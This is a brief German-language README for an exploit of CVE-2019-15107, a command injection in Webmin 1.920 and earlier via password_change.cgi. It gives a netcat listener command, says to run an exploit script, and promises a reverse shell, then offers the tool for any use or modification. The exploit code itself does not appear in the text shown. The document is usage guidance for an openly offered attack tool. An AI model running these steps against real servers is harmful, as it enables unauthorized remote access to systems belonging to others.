
webmin <=1.920 - RCE-Schwachstelle durch Befehlseinschleusung
https://www.cvedetails.com/cve/CVE-2019-15107/
Ein Problem wurde in Webmin <=1.920 entdeckt. Die Parameter "old" und "expire" in password_change.cgi enthalten eine Command Injection-Sicherheitslücke.
rlwrap -cAr nc -lvp 1919
./exploit.sh
Lassen Sie das Ganze laufen, eine Reverse Shell wird auf dem Listener empfangen.

Sie können es nach Belieben verwenden oder modifizieren, wann und wo immer Sie möchten.